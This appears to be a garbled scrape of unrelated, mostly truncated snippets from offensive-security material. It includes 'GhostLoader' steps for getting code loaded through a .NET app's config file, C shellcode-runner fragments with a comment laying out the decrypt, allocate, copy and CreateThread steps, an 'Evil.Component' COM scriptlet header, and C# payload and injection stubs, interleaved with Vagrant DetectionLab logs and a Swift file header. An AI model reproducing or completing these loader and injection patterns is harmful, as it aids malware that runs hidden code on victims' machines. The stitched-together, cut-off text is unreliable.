GhostLoader Steps :)
1. Create C:\Tools
2. Copy a .NET binary (any .NET binary will do) to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe

#include "pch.h"
#include <windows.h>

int main() {
    unsigned char shellcode[] = "\x00..";
    //Execute shellcode
    void *exec = VirtualAlloc(0, shellcodeSize, MEM_COMMIT, PAGE_READWRITE);
    DWORD OldProtect = NULL;

#include <windows.h>
#include <stdio.h>
#include <string.h>

/*
1. Decrypt the encrypted shellcode with the key that was used to encrypt it.
2. Allocate enough virtual memory for the decrypted shellcode using VirtualAlloc()
3. Copy the decrypted shellcode to the allocated memory using RtlMoveMemory()
4. Execute that memory region using CreateThread()
*/

<?XML version="1.0"?>
<scriptlet>
<registration
    description="Evil.Component"
    progid="Evil.Component"
    version="1"
    classid="{69486DD6-C19F-42e8-B508-A53F9F8E67B8}"
    remotable="true"
>

Bringing machine 'wef' up with 'vmware_desktop' provider...
==> wef: Cloning VMware VM: 'detectionlab/win2016'. This can take some time...
==> wef: Checking if box 'detectionlab/win2016' version '1.4' is up to date...
==> wef: Verifying vmnet devices are healthy...
==> wef: Preparing network adapters...
WARNING: The VMX file for this box contains a setting that is automatically overwritten by Vagrant
WARNING: when started. Vagrant will stop overwriting this setting in an upcoming release which may
WARNING: prevent proper networking setup. Below is the detected VMX setting:
WARNING:
WARNING: ethernet0.pcislotnumber = "33"

Bringing machine 'logger' up with 'vmware_desktop' provider...
==> logger: Cloning VMware VM: 'bento/ubuntu-16.04'. This can take some time...
==> logger: Checking if box 'bento/ubuntu-16.04' version '201808.24.0' is up to date...
==> logger: A newer version of the box 'bento/ubuntu-16.04' for provider 'vmware_desktop' is
==> logger: available! You currently have version '201808.24.0'. The latest is version
==> logger: '201912.04.0'. Run `vagrant box update` to update.
==> logger: Verifying vmnet devices are healthy...
==> logger: Preparing network adapters...
==> logger: Starting the VMware VM...
==> logger: Waiting for the VM to receive an address...

using System;
using System.IO;
using System.Net;
using System.Diagnostics;
using System.IO.Compression;
using System.Runtime.InteropServices;

public class Payload
{
    public Payload()

using System;
using System.IO;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Net;
using System.IO.Compression;

public class Payload
{

using System;
using System.Runtime.InteropServices;

namespace Inject
{
    class Program
    {
        static void Main(string[] args)
        {
            byte[] shellcode;

//
//  main.swift
//  HTTPGet
//
//  Created by david on 9/30/20.
//

import Foundation

func async_req() -> Void {